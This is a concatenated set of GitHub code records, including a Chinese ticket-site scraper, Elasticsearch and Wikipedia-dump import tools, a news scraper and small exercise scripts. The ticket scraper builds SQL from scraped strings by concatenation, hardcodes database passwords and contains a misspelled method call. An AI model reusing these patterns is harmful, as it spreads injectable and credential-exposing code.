[]\n rules = re.compile(r'.*/content/.*')\n soup = BeautifulSoup(content, features='html.parser')\n for i in soup.findAll('a', {'class': 'show-items sa_entrance'}):\n currurl = str(i.get('href', ''))\n modifiedurl = urllib.parse.urljoin(page, currurl)\n if not rules.match(str(modifiedurl)):\n continue\n if urllib.parse.urlparse(modifiedurl).scheme not in ('http', 'https'):\n continue\n links.append(modifiedurl)\n return links\n\n\ndef split_time_addr(title_ele_content):\n rule1 = re.compile(r'[0-9]{4}.[0-9]{2}.[0-9]{2}-[0-9]{4}.[0-9]{2}.[0-9]{2}')\n rule2 = re.compile(r'[0-9]{4}.[0-9]{2}.[0-9]{2}')\n rule3 = re.compile(r'[0-9]{2}:[0-9]{2}')\n str_list = title_ele_content.split()\n str_len = len(str_list)\n title_time_content = 'None'\n place = 'None'\n if str_list[str_len - 1] == '查看座位图':\n del(str_list[str_len - 1])\n str_len -= 1\n if rule1.match(str_list[0]):\n place = ''\n title_time_content = str_list[0]\n for i in range(str_len - 1):\n place = place + str_list[i + 1] + ' '\n elif rule2.match(str_list[0]):\n place = ''\n if rule3.match(str_list[1]):\n title_time_content = str_list[0] + ' ' + str_list[1]\n for i in range(str_len - 2):\n place = place + str_list[i + 2] + ' '\n else:\n title_time_content = str_list[0]\n for i in range(str_len - 1):\n place = place + str_list[i + 1]\n else:\n title_time_content = 'None'\n place = 'None'\n return [title_time_content, place]\n\n\ndef split_time(time_str):\n rule1 = re.compile(r'-[0-9]{4}\\.[0-9]{2}\\.[0-9]{2}')\n rule2 = re.compile(r'[0-9]{2}:[0-9]{2}')\n start_date = '0000-00-00'\n end_date = start_date\n if rule1.search(time_str):\n start_date = time_str[:10].replace('.', '-')\n end_date = time_str[11:].replace('.', '-')\n elif rule2.search(time_str):\n start_date = time_str[:10].replace('.', '-')\n end_date = start_date\n return [start_date, end_date]\n\n\ndef split_price(price_str):\n rule = re.compile(r'[0-9]+\\.?[0-9]*')\n m = rule.seach(price_str)\n if m:\n return float(m.group(0))\n else:\n return 0\n\n\ndef get_ticket_info(soup):\n # 演出时间\n perform_time = soup.find('div', {'id': 'session-container'})\n if perform_time is None:\n perform_time_content = 'Unknown'\n else:\n perform_time_content = str(perform_time.find('div', {'class': 'normal-list-item list-one active'}).get('data-time'))\n\n # 票种和价钱\n tickets = []\n tickets_container = soup.find('div', {'id': 'sessionPar-container'})\n if tickets_container is not None:\n for i in tickets_container.findAll('div'):\n price = str(i.get('data-price'))\n seatname = str(i.get('data-seatname'))\n comments = str(i.get('data-comments'))\n if seatname == 'None':\n seatname = ''\n if comments == 'None':\n comments = ''\n ticket_text = seatname + ' ' + comments\n ticket_status = i.i\n if ticket_status is None:\n ticket_status_text = 'None'\n else:\n ticket_status_text = ticket_status.get_text()\n obj = {\n 'price': price, # 真实价格 不用parse\n 'label': ticket_text, # div上实际显示的字符\n 'status': ticket_status_text # 暂缺 or None\n }\n tickets.append(obj)\n return {\n 'time': perform_time_content,\n 'price': tickets\n }\n\n\ndef analysis_detailpage(page, content, browser):\n global data\n soup = BeautifulSoup(content, features='html.parser')\n # 图片\n image = soup.find('div', {'class': 'show-poster'})\n if image is None:\n image_url = 'None'\n else:\n image_url = str(image.a.img.get('src', ''))\n # 标题\n title = soup.find('div', {'class': 'show-title'})\n if title is None:\n title_content = 'None'\n else:\n title_content = str(title.span.get_text())\n # 标题时间 & 地点\n title_ele = soup.find('div', {'class': 'show-address'})\n if title_ele is None:\n title_ele_content = 'None'\n title_time_content = 'None'\n place = 'None'\n else:\n title_ele_content = str(title_ele.get_text()).replace('\\n', '').strip()\n time_addr = split_time_addr(title_ele_content)\n title_time_content = time_addr[0]\n place = time_addr[1]\n # 演出详细信息\n detail = soup.find('div', {'id': 'intro_panel'})\n if detail is None:\n detail_content = 'None'\n else:\n detail_content = str(detail).replace(u'\\xa0', u'').replace('\\n', '')\n # 组装演出信息\n date = split_time(title_time_content)\n raw_data = {\n 'name': title_content,\n 'image': image_url,\n 'start_date': date[0],\n 'end_date': date[1],\n 'address': place,\n 'website': str(page),\n 'goods_type': performance_type,\n 'detail': detail_content,\n 'tickets': []\n }\n\n # 遍历所有场次 获得每种场次票务信息\n try:\n father = browser.find_element_by_xpath('//div[@id=\"session-container\"]')\n except: # 遇到演出取消\n if dataLock.acquire():\n data.append(raw_data)\n dataLock.release()\n print('演出取消!')\n return\n \n for i in father.find_elements_by_xpath('./ul/li/div'):\n try:\n i.click()\n time.sleep(0.15)\n except:\n print('CLICK ERROR!')\n content = browser.page_source\n soup = BeautifulSoup(content, features='html.parser')\n ticket_obj = get_ticket_info(soup)\n raw_data['tickets'].append(ticket_obj)\n\n if dataLock.acquire():\n data.append(raw_data)\n dataLock.release() \n\n\ndef save_data():\n mysql_conn = connect(\n host='localhost',\n port=3306,\n user='root',\n password='root',\n database='jupiter_update',\n charset='utf8'\n )\n mysql_cur = mysql_conn.cursor()\n\n mongo_conn = MongoClient('mongodb://localhost:27017/')\n mongo_conn.jupiter_test.authenticate('root', '123456', mechanism='SCRAM-SHA-1')\n mongo_db = mongo_conn['jupiter']\n collection = mongo_db['goodsdetail']\n\n find_max = 'select max(goods_id) from goods'\n for i in range(len(data)):\n goods_insert_sql = 'insert into goods VALUES(null, \\\"' + \\\n data[i]['name'] + '\\\", \\\"' + \\\n data[i]['start_date'] + '\\\", \\\"' + \\\n data[i]['end_date'] + '\\\", \\\"' + \\\n data[i]['address'] + '\\\", \\\"' + \\\n data[i]['website'] + '\\\", ' + \\\n str(data[i]['goods_type']) + ', \\\"' + \\\n data[i]['image'] + '\\\", 0, 0)'\n try:\n mysql_cur.execute(goods_insert_sql)\n mysql_cur.execute(find_max)\n max_goodsid = int(mysql_cur.fetchone()[0])\n except:\n print(goods_insert_sql)\n continue\n\n document = {'goods_id': max_goodsid, 'detail': data[i]['detail']}\n try:\n collection.insert_one(document=document)\n except:\n print('ERROR IN MongoDB!')\n continue\n\n tickets = data[i]['tickets']\n for ticket_index in range(len(tickets)):\n price = tickets[ticket_index]['price']\n ticket_time = tickets[ticket_index]['time']\n\n for price_index in range(len(price)):\n if price[price_index]['status'] == '暂缺':\n status = 0 # 缺票\n else:\n status = 1 # 有票\n ticket_insert_sql = 'insert into goodsdetail VALUES(null, ' + \\\n str(max_goodsid) + ', ' + \\\n str(price[price_index]['price']) + ', ' + \\\n str(status) + ', \\\"' + \\\n ticket_time + '\\\", \\\"' + \\\n price[price_index]['label'] + '\\\")'\n try:\n mysql_cur.execute(ticket_insert_sql)\n except:\n print(ticket_insert_sql)\n continue\n mysql_conn.commit()\n mysql_cur.close()\n mysql_conn.close()\n \n\n\ndef do_nothing():\n return \n\n\ndef working(flag, count, n):\n global NUM\n option = webdriver.ChromeOptions()\n browser = webdriver.Chrome(\"C:\\Program Files (x86)\\Google\\Chrome\\Application\\chromedriver.exe\", options=option)\n rules = re.compile(r'.*/list/.*')\n\n while flag:\n page = q.get()\n if page == '-':\n count += 1\n if count >= maxpage:\n flag = False\n continue\n if page not in crawled:\n try:\n content = get_page(page, browser)\n except urllib.error.HTTPError:\n continue\n print('I am thread', n, page)\n count += 1\n if count >= maxpage:\n flag = False\n if False: # 主页\n outlinks = []\n for link in outlinks:\n q.put(link)\n elif rules.match(str(page)): # 搜索页\n while True:\n outlinks = get_searchpage_links(page, content)\n for link in outlinks:\n q.put(link)\n if not rollpage(browser):\n break\n js = \"var q=document.documentElement.scrollTop=10000\"\n browser.execute_script(js)\n time.sleep(0.2)\n browser.execute_script(js)\n time.sleep(0.2)\n content = browser.page_source\n for i in range(50):\n q.put('-') # 填充用的\n else: # 票务详情页\n analysis_detailpage(page, content, browser)\n # do_nothing()\n \n if varLock.acquire():\n crawled.append(page)\n varLock.release()\n if countLock.acquire():\n NUM = NUM - 1\n countLock.release()\n if NUM == 0:\n save_data()\n\n\nif __name__ == '__main__':\n flag = True\n count = 0\n maxpage = 3\n NUM = 4\n performance_type = 6 # 演出类型\n seed = 'https://www.moretickets.com/list/3205-dance/hottest'\n varLock = threading.Lock()\n dataLock = threading.Lock()\n countLock = threading.Lock()\n q = queue.Queue()\n crawled = []\n threads = []\n data = [] # 演出json数据\n q.put(seed)\n \n for i in range(NUM):\n t = threading.Thread(target = working, args = (flag, count, i))\n t.setDaemon(True)\n threads.append(t)\n\n # start each thread\n mark = True\n for t in threads:\n t.start()\n \n # join threads\n for t in threads:\n t.join()\n\n ","repo_name":"SJTUSummerProj2020/Jupiter","sub_path":"crawl/crawl_moretickets.py","file_name":"crawl_moretickets.py","file_ext":"py","file_size_in_byte":12580,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"347371753","text":"# -*- coding: utf-8 -*-\nimport logging\n\nimport elasticsearch.exceptions\nimport elasticsearch_dsl\n\nfrom pyjobsweb import model\nfrom pyjobsweb.commands import AppContextCommand\nfrom pyjobsweb.lib.lock import acquire_inter_process_lock\n\n\nclass PurgeESCommand(AppContextCommand):\n \"\"\"\n Purge Elasticsearch indixes by dropping and re-creating them\n \"\"\"\n def __init__(self, *args, **kwargs):\n super(PurgeESCommand, self).__init__(args, kwargs)\n self._logger = logging.getLogger(__name__)\n\n def get_parser(self, prog_name):\n parser = super(PurgeESCommand, self).get_parser(prog_name)\n\n jobs_help_msg = 'purges the jobs index of the elasticsearch database'\n parser.add_argument('-j', '--jobs',\n help=jobs_help_msg,\n dest='purge_jobs_index',\n action='store_const', const=True)\n\n companies_help_msg = 'purges the companies index of the elasticsearch' \\\n 'database'\n parser.add_argument('-co', '--companies',\n help=companies_help_msg,\n dest='purge_companies_index',\n action='store_const', const=True)\n\n geocomplete_help_msg = \\\n 'purges the geocomplete index of the elasticsearch database'\n parser.add_argument('-g', '--geocomplete',\n help=geocomplete_help_msg,\n dest='purge_geocomplete_index',\n action='store_const', const=True)\n\n return parser\n\n def _logging(self, logging_level, message):\n self._logger.log(logging_level, message)\n\n def _perform_index_purge(self, index_name, index_settings, doc_type_class):\n log_msg = 'Dropping %s index.' % index_name\n self._logging(logging.INFO, log_msg)\n\n index = elasticsearch_dsl.Index(index_name)\n index.settings(**index_settings)\n index.doc_type(doc_type_class)\n\n try:\n index.delete(ignore=404)\n index.create()\n except elasticsearch.exceptions.ElasticsearchException as e:\n log_msg = 'Error while dropping %s index: %s.' % (index_name, e)\n self._logging(logging.ERROR, log_msg)\n return\n\n log_msg = 'Index %s has been dropped successfully.' % index_name\n self._logging(logging.INFO, log_msg)\n\n def _purge_index(self, index_name, index_settings, doc_type_class):\n log_msg = 'Purging index %s.' % index_name\n self._logging(logging.INFO, log_msg)\n\n with acquire_inter_process_lock('purge_%s' % index_name) as acquired:\n if not acquired:\n err_msg = 'Another process is already purging the %s ' \\\n 'index, aborting now.' % index_name\n self._logging(logging.WARNING, err_msg)\n else:\n self._perform_index_purge(index_name,\n index_settings, doc_type_class)\n\n def _perform_sync_reset(self, sqlalchemy_table_class):\n # Update the Postgresql database\n table_name = sqlalchemy_table_class.__tablename__\n\n log_msg = 'Resetting Postgresql %s table sync data.' % table_name\n self._logging(logging.INFO, log_msg)\n\n sqlalchemy_table_class.reset_last_sync()\n\n log_msg = 'Postgresql %s table sync data successfully reset.' \\\n % table_name\n self._logging(logging.INFO, log_msg)\n\n def _reset_sync(self, index_name, sqlalchemy_table_class):\n err_msg = 'Resetting synchronization data for index %s.' % index_name\n self._logging(logging.WARNING, err_msg)\n\n with acquire_inter_process_lock('purge_%s' % index_name) as acquired:\n if not acquired:\n err_msg = 'Another process is already resetting the %s ' \\\n 'index synchronization data, aborting now.' \\\n % index_name\n self._logging(logging.WARNING, err_msg)\n else:\n self._perform_sync_reset(sqlalchemy_table_class)\n\n def purge_jobs_index(self):\n index_name = model.JobElastic().index\n self._purge_index(index_name, dict(), model.JobElastic)\n self._reset_sync(index_name, model.JobAlchemy)\n\n def purge_companies_index(self):\n index_name = model.CompanyElastic().index\n self._purge_index(index_name, dict(), model.CompanyElastic)\n self._reset_sync(index_name, model.CompanyAlchemy)\n\n def purge_geocomplete_index(self):\n index_name = model.Geocomplete().index\n self._purge_index(index_name, dict(), model.Geocomplete)\n\n def take_action(self, parsed_args):\n super(PurgeESCommand, self).take_action(parsed_args)\n\n if parsed_args.purge_jobs_index:\n self.purge_jobs_index()\n\n if parsed_args.purge_companies_index:\n self.purge_companies_index()\n\n if parsed_args.purge_geocomplete_index:\n self.purge_geocomplete_index()","repo_name":"pyjobs/web","sub_path":"pyjobs_web/pyjobsweb/commands/purge_es.py","file_name":"purge_es.py","file_ext":"py","file_size_in_byte":5062,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"52"} +{"seq_id":"1795369245","text":"\"\"\"A+B-8\"\"\"\n\n# 테스트 케이스 개수 T 입력\nT = int(input())\n\n# 저장 리스트 선언\nstore = []\n\n# 테스트 케이스 개수만큼 숫자 2개 입력받아 저장\nfor i in range(T):\n store.append(input())\n\n# 입력받은 수를 a, b로 나누어 각 테스트 케이스마다 \"Case #x: A + B = C\" 형식으로 출력\nfor i in range(T):\n a, b = map(int, store[i].split())\n print('Case #{}: {} + {} = {}'.format(i+1, a, b, a + b))","repo_name":"davemins/algorithm-boj","sub_path":"03_반복문/11022.py","file_name":"11022.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5298187544","text":"\"\"\"Unit tests for the durable functions library\"\"\"\nimport os\nimport sys\nimport unittest\n\n\ndef suite():\n \"\"\"\n\n :return: configuration for the suite of tests\n \"\"\"\n test_loader = unittest.TestLoader()\n test_suite = test_loader.discover(\n os.path.dirname(__file__), pattern='test_*.py')\n return test_suite\n\n\nif __name__ == '__main__':\n runner = unittest.runner.TextTestRunner()\n result = runner.run(suite())\n sys.exit(not result.wasSuccessful())\n","repo_name":"Azure/azure-functions-durable-python","sub_path":"tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":113,"dataset":"github-code","pt":"52"} +{"seq_id":"4232603223","text":"import mysql.connector\nimport pandas as pd\nimport numpy as np\n#Connect database\ndb = mysql.connector.connect(\n user='root',\n password='123123',\n host='localhost',\n database='customer',\n autocommit=True\n)\ncursor = db.cursor()\n\n#Read file csv\ndata = pd.read_csv(\"customer.csv\")\n\n#Handling data None\ndata = data.replace({np.nan: None})\ndata_tuples = data.itertuples()\n\ndef create_table():\n name = [i for i in data]\n type = [i for i in data.dtypes]\n query = \"CREATE TABLE customers(\"\n for i in range(len(name)):\n if type[i]==\"int64\":\n query += name[i]\n query += \" int(10),\"\n elif type[i]==\"object\":\n query += name[i]\n query += \" varchar(100),\"\n else:\n pass\n query = query[:-1]\n query += \");\"\n # print(query)\n cursor.execute(query)\n\ndef insert_data_into_table():\n sql = \"INSERT INTO customers VALUE(\"\n for column in data:\n sql += \"%s,\"\n sql = sql[:-1]\n sql += \");\"\n for row in data_tuples:\n cursor.execute(sql,row[1::])\n\nif __name__ == '__main__':\n create_table()\n insert_data_into_table()\n","repo_name":"huskyloveme/litc_algorithms","sub_path":"2/add_database.py","file_name":"add_database.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"14239543274","text":"import glob\nimport json\nimport re\nimport time\nfrom collections import defaultdict\nfrom datetime import datetime\nimport os.path\n\nfrom tqdm import tqdm\n\nimport click\nfrom flask.cli import with_appcontext\n\nfrom .db import get_db\nfrom WHParallelParser import WHParallelParser\nimport mwparallelparser\n\n\n@click.command('import-enterprise-dump')\n@click.argument('lang')\n@click.argument('dump_date')\n@click.argument('dump_path')\n@click.option('-e', '--early-stopping', type=int, default=-1, help='stop dump parsing after -e articles. -1 means no '\n 'early stopping.')\n@click.option('-d', '--dump-id', type=int, default=-1, help='continue the import for a specified dump id')\n@click.option('-g', '--ground-truth-id', type=int, default=-1, help='continue the import for a specified ground truth')\n@click.option('-s', '--start-step', type=int, default=1, help='continue the import from a specified step')\n@with_appcontext\ndef import_enterprise_dump_command(lang, dump_date, dump_path, early_stopping, dump_id, ground_truth_id, start_step):\n filename_metadata = f'{lang}wiki-{dump_date}-enterprise-metadata.json'\n\n homedir = os.path.expanduser(\"~/\")\n if homedir == \"~/\":\n raise ValueError('could not find a default download directory')\n\n download_dir = os.path.join(homedir, 'wikigold_data')\n if not os.path.exists(download_dir):\n os.mkdir(download_dir)\n\n filepath_metadata = os.path.join(download_dir, filename_metadata)\n\n db = get_db()\n cursor = db.cursor()\n\n sql_charter_maximum_length = '''SELECT character_maximum_length FROM information_schema.columns \n WHERE table_name = %s AND column_name = %s'''\n cursor.execute(sql_charter_maximum_length, ('articles', 'title'))\n title_maximum_length = cursor.fetchone()[0]\n\n cursor.execute(sql_charter_maximum_length, ('lines', 'content'))\n line_content_maximum_length = cursor.fetchone()[0]\n\n cursor.execute(sql_charter_maximum_length, ('labels', 'label'))\n label_maximum_length = cursor.fetchone()[0]\n\n if dump_id == -1:\n parser_name = mwparallelparser.__name__\n parser_version = mwparallelparser.__version__\n sql_add_dump = \"INSERT INTO dumps (`lang`, `name`, `parser_name`, `parser_version`, `timestamp`) VALUES (%s, %s, %s, %s, %s)\"\n name = f'{lang}wiki-{dump_date}'\n data_dump = (lang, name, parser_name, parser_version, datetime.now().isoformat())\n cursor.execute(sql_add_dump, data_dump)\n dump_id = cursor.lastrowid\n\n sql_add_ground_truth = \"INSERT INTO ground_truth (`name`, `description`, `dump_id`, `knowledge_base_id`) VALUES (%s, %s, %s, %s)\"\n data_ground_truth = (\"wikipedia\", \"Links created by Wikipedia contributors.\", dump_id, dump_id)\n cursor.execute(sql_add_ground_truth, data_ground_truth)\n ground_truth_id = cursor.lastrowid\n\n db.commit() # save dump into database\n\n def step_1():\n print(f'step 1. processing dump...')\n\n dump_filepaths = sorted(glob.glob(os.path.join(dump_path, '*.ndjson')),\n key=lambda fn: int(re.sub(r'[^0-9]', '', fn)))\n dump_filenames = [os.path.basename(filepath) for filepath in dump_filepaths]\n\n if not os.path.exists(filepath_metadata):\n print('collecting metadata ...')\n articles_counter = {}\n for filename in dump_filenames:\n print(f'counting articles in {filename}...')\n articles_counter[filename] = 0\n filepath = os.path.join(dump_path, filename)\n with open(filepath) as fp:\n for line in fp:\n articles_counter[filename] += 1\n\n metadata = {'articles_counter': articles_counter}\n with open(filepath_metadata, 'w') as file:\n json.dump(metadata, file)\n print('done')\n else:\n print(f'loading metadata from: {filename_metadata}')\n with open(filepath_metadata, 'r') as file:\n metadata = json.load(file)\n\n sql_add_article = \"INSERT INTO `articles` (`title`, `caption`, `dump_id`) VALUES (%s, %s, %s)\"\n sql_add_article_redirect = \"INSERT INTO `articles` (`title`, `redirect_to_title`, `dump_id`) VALUES (%s, %s, %s)\"\n\n sql_add_line = \"INSERT INTO `lines` (`article_id`, `nr`, `content`) VALUES (%s, %s, %s)\"\n sql_add_ground_truth_decisions = '''INSERT INTO `ground_truth_decisions`\n (`source_article_id`, `source_line_id`, `start`, `length`, `label`, `destination_title`, `ground_truth_id`) VALUES (%s, %s, %s, %s, %s, %s, %s)'''\n\n parser = WHParallelParser()\n\n def process_article(article):\n title = article['name']\n if len(title) > title_maximum_length:\n print(f\"title '{article[:title_maximum_length]}...' exceeds maximum length ({title_maximum_length})\")\n return\n\n # parse article before processing redirects\n try:\n article_parsed = parser.parse_html(article['article_body']['html'])\n except Exception:\n print(f'{title}: parser error')\n return\n\n if 'redirects' in article:\n for redirect in article['redirects']:\n data_article_redirect = (redirect['name'], article['name'], dump_id)\n cursor.execute(sql_add_article_redirect, data_article_redirect)\n\n try:\n caption = article_parsed.text[0]\n except IndexError:\n caption = None\n data_article = (title, caption, dump_id)\n cursor.execute(sql_add_article, data_article)\n article_id = cursor.lastrowid\n\n wikipedia_decisions = defaultdict(list)\n for tag in article_parsed.data:\n if tag['tag'] == 'a' and 'rel' in tag['attrs'] and 'mw:WikiLink' in tag['attrs']['rel'] \\\n and 'title' in tag['attrs'] and ':' not in tag['attrs']['title']: # filtrowanie tylko linków Wikipedii\n if tag['start'][0] != tag['end'][0]:\n print(f'{title}: multiline links not supported')\n continue\n line = tag['start'][0]\n length = tag['end'][1] - tag['start'][1] + 1\n link = {\n 'start': tag['start'][1],\n 'length': length,\n 'destination': tag['attrs']['title'],\n }\n link['label'] = article_parsed.text[line][link['start']:link['start'] + link['length']]\n wikipedia_decisions[line].append(link)\n\n for line_nr, content in enumerate(article_parsed.text):\n if len(content) > line_content_maximum_length:\n print(\n f\"line {article['name']}({line_nr}): '{content[:50]}...' exceeds maximum length ({line_content_maximum_length})\")\n continue\n data_line = (article_id, line_nr, content)\n cursor.execute(sql_add_line, data_line)\n line_id = cursor.lastrowid\n if line_nr in wikipedia_decisions:\n for link in wikipedia_decisions[line_nr]:\n label = link['label']\n if len(label) > label_maximum_length:\n print(\n f\"label {label} in {article['name']}({line_nr}): '{label[:label_maximum_length]}...' \"\n f\"exceeds length ({label_maximum_length})\")\n continue\n destination = link['destination']\n if len(destination) > title_maximum_length:\n print(f\"destination: '{destination[:title_maximum_length]}...' \"\n f\"exceeds maximum length ({title_maximum_length})\")\n continue\n\n data_ground_truth_decision = (\n article_id, line_id, link['start'], link['length'], label, destination, ground_truth_id)\n cursor.execute(sql_add_ground_truth_decisions, data_ground_truth_decision)\n db.commit() # commit after each article\n\n # main article processing loop\n articles_processed = 0\n stop_processing = False\n total_articles = sum(metadata['articles_counter'].values())\n with tqdm(total=total_articles) as pbar:\n for filename in dump_filenames:\n filepath = os.path.join(dump_path, filename)\n with open(filepath) as fp:\n for line in fp:\n article = json.loads(line)\n process_article(article)\n pbar.update(1)\n articles_processed += 1\n if early_stopping != -1 and articles_processed >= early_stopping:\n stop_processing = True\n break\n if stop_processing:\n break\n\n def step_2():\n print('step 2. saving labels...', end=' ')\n start = time.time_ns()\n sql_create_labels = '''INSERT INTO `labels` (`label`, `dump_id`, `counter`)\n SELECT `label`, `ground_truth_id`, COUNT(*) FROM `ground_truth_decisions` WHERE `ground_truth_id`=%s GROUP BY `label`'''\n cursor.execute(sql_create_labels, (ground_truth_id,))\n db.commit()\n elapsed = (time.time_ns() - start) / 1e9\n print(f'{elapsed:.2f} s')\n\n def step_3():\n print('step 3. updating ground_truth_decisions destination_ids...', end=' ')\n start = time.time_ns()\n sql_update_ground_truth_decisions= '''\n UPDATE `ground_truth_decisions` INNER JOIN `articles` ON `ground_truth_decisions`.`destination_title`=`articles`.`title`\n SET `ground_truth_decisions`.`destination_article_id` = `articles`.`id`\n WHERE `ground_truth_decisions`.`ground_truth_id`=%s AND `articles`.`dump_id`=%s'''\n cursor.execute(sql_update_ground_truth_decisions, (ground_truth_id, dump_id))\n db.commit()\n elapsed = (time.time_ns() - start) / 1e9\n print(f'{elapsed:.2f} s')\n\n def step_4():\n print('step 4. updating ground_truth_decisions label_ids...', end=' ')\n start = time.time_ns()\n sql_update_ground_truth_decisions = '''\n UPDATE `ground_truth_decisions` INNER JOIN `labels` ON `ground_truth_decisions`.`label`=`labels`.`label`\n SET `ground_truth_decisions`.`label_id` = `labels`.`id`\n WHERE `ground_truth_decisions`.`ground_truth_id`=%s AND `labels`.`dump_id`=%s'''\n cursor.execute(sql_update_ground_truth_decisions, (ground_truth_id, dump_id))\n db.commit()\n elapsed = (time.time_ns() - start) / 1e9\n print(f'{elapsed:.2f} s')\n\n def step_5():\n print('step 5. updating articles redirects...', end=' ')\n start = time.time_ns()\n sql_update_article_redirect = '''\n UPDATE `articles` `a1` INNER JOIN `articles` `a2` ON `a1`.`redirect_to_title`=`a2`.`title`\n SET `a1`.`caption`=`a2`.`caption`, `a1`.`redirect_to_id`=`a2`.`id`\n WHERE `a1`.`dump_id`=%s AND `a2`.`dump_id`=%s'''\n data_article_redirect = (dump_id, dump_id)\n cursor.execute(sql_update_article_redirect, data_article_redirect)\n db.commit()\n elapsed = (time.time_ns() - start) / 1e9\n print(f'{elapsed:.2f} s')\n\n def step_6():\n print('step 6. updating articles counters...', end=' ')\n start = time.time_ns()\n sql_update_article_counter = '''UPDATE `articles` INNER JOIN\n (SELECT `destination_title`, COUNT(*) AS `counter` FROM `ground_truth_decisions`\n WHERE `ground_truth_id`=%s GROUP BY `destination_title`) `wd1`\n ON `articles`.`title`=`wd1`.`destination_title`\n SET `articles`.`counter`=`wd1`.`counter`\n WHERE `articles`.`dump_id`=%s'''\n cursor.execute(sql_update_article_counter, (ground_truth_id, dump_id))\n db.commit()\n elapsed = (time.time_ns() - start) / 1e9\n print(f'{elapsed:.2f} s')\n\n def step_7():\n print('step 7. saving labels_articles...', end=' ')\n start = time.time_ns()\n sql_create_labels_articles = '''INSERT INTO `labels_articles` (`label_id`, `title`, `article_id`, `counter`)\n SELECT `wd`.`label_id`, `wd`.`destination_title`, `wd`.`destination_article_id`, COUNT(*)\n FROM `ground_truth_decisions` `wd`\n WHERE `wd`.`ground_truth_id`=%s\n GROUP BY `wd`.`label_id`, `wd`.`destination_title`, `wd`.`destination_article_id`'''\n cursor.execute(sql_create_labels_articles, (ground_truth_id,))\n db.commit()\n elapsed = (time.time_ns() - start) / 1e9\n print(f'{elapsed:.2f} s')\n\n def step_8():\n print('step 8. save articles count...', end=' ')\n start = time.time_ns()\n sql_update_articles_count = '''UPDATE `dumps` SET `articles_count`=\n (SELECT COUNT(*) FROM articles WHERE `dump_id`=%s AND `redirect_to_title` IS NULL)\n WHERE `id`=%s'''\n cursor.execute(sql_update_articles_count, (dump_id, dump_id))\n db.commit()\n elapsed = (time.time_ns() - start) / 1e9\n print(f'{elapsed:.2f} s')\n\n # apply selected steps\n for step in range(start_step, 9):\n locals()[f'step_{step}']()\n\n cursor.close()\n\n\ndef init_app(app):\n app.cli.add_command(import_enterprise_dump_command)\n","repo_name":"solewniczak/wikigold","sub_path":"src/wikigold/enterprisedump.py","file_name":"enterprisedump.py","file_ext":"py","file_size_in_byte":14057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32165651993","text":"\"\"\"\nCP1404 - Practicals\nEmails\n\"\"\"\n\n\ndef main():\n \"\"\"Create dictionary of emails to names\"\"\"\n email_to_name = {}\n email = str(input(\"Email: \"))\n while email != \"\":\n name = get_name_from_email(email).title()\n confirm = str(input(f\"Is your name {name}? (Y/n)\")).lower()\n if confirm != \"\" and confirm != \"y\":\n name = str(input(\"Name: \"))\n email_to_name[email] = name\n email = str(input(\"Email: \"))\n for key, value in email_to_name.items():\n print(f\"{value} ({key})\")\n\n\ndef get_name_from_email(email):\n \"\"\"Use string formatting to get name from email address\"\"\"\n name_part = email.split(\"@\")[0]\n names = name_part.split(\".\")\n name = \" \".join(names)\n return name\n\n\nmain()\n","repo_name":"taylor-stinson/cp1404practicals","sub_path":"prac_05/emails.py","file_name":"emails.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1102271737","text":"from sdb.scrapers.base_scraper import BaseScraper, ScraperConfig\n\nSuwayda24_Config = ScraperConfig(\n url_template=\"https://suwayda24.com/?cat=%2A&paged={page_num}\",\n publication=\"Suwayda 24\",\n should_get_metadata_during_pagination=False,\n)\n\n\nclass Suwayda24(BaseScraper):\n def __init__(self):\n self.config = Suwayda24_Config\n\n def get_all_articles(self, soup):\n \"\"\"Finds all articles on a single page\"\"\"\n\n articles = soup.find(\"div\", class_=\"post-listing archive-box\").find_all(\n \"article\"\n )\n return articles[:10]\n\n def get_article_title(self, article):\n \"\"\"Finds the title of an article\"\"\"\n\n return article.find(\"h2\", class_=\"post-box-title\").text\n\n def get_article_link(self, article):\n \"\"\"Finds the link of an article\"\"\"\n\n return article.find(\"h2\", class_=\"post-box-title\").find(\"a\").get(\"href\")\n\n def get_full_text_and_date_posted(self, article_link):\n \"\"\"Gets text and last updated date from article\"\"\"\n\n # bs4 setup\n soup = self.get_soup(url=article_link)\n\n # Get script w/ date object\n date_posted = soup.find(\"meta\", property=\"article:published_time\").get(\n \"content\"\n )\n\n # Identifies paragraphs and creates empty variable for text content\n paragraphs = soup.find(\"div\", class_=\"entry\").find_all(\"p\", recursive=False)\n full_text = \"\\n\\n\".join(paragraph.text for paragraph in paragraphs)\n\n return date_posted, full_text\n","repo_name":"jclark1913/syria-daily-brief","sub_path":"sdb/scrapers/suwayda24.py","file_name":"suwayda24.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"21353748618","text":"def cal():\n count = int(input())\n x = [int(input()) for _a in range(count)]\n for step in reversed(range(len(x))):\n max_index = 0\n for i in range(1, 1+step):\n if x[i] > x[max_index]:\n max_index = i\n x[max_index], x[step] = x[step], x[max_index]\n [print(a) for a in x]\n\n\ndef cal2():\n count = int(input())\n x = [int(input()) for _a in range(count)]\n print(list(reversed(sorted(x))))\n\n\nif __name__ == '__main__':\n cal()\n\n# reverse, reversed 또한 sort, sorted 랑 같은 형태이다.\n# 첫번째꺼는 반환x,이고 자기것을 바꾸는대신 두번째는 반환만 한다.\n","repo_name":"joonseolee/bundle-coding-test","sub_path":"boj/sort/Q2750.py","file_name":"Q2750.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72190357926","text":"import base64\r\nimport hashlib\r\nimport io\r\nimport os\r\nimport uuid\r\n\r\nfrom django.conf import settings\r\nfrom django.core.exceptions import ValidationError\r\nfrom django.core.files.base import ContentFile\r\nfrom django.core.files.storage import default_storage\r\nfrom 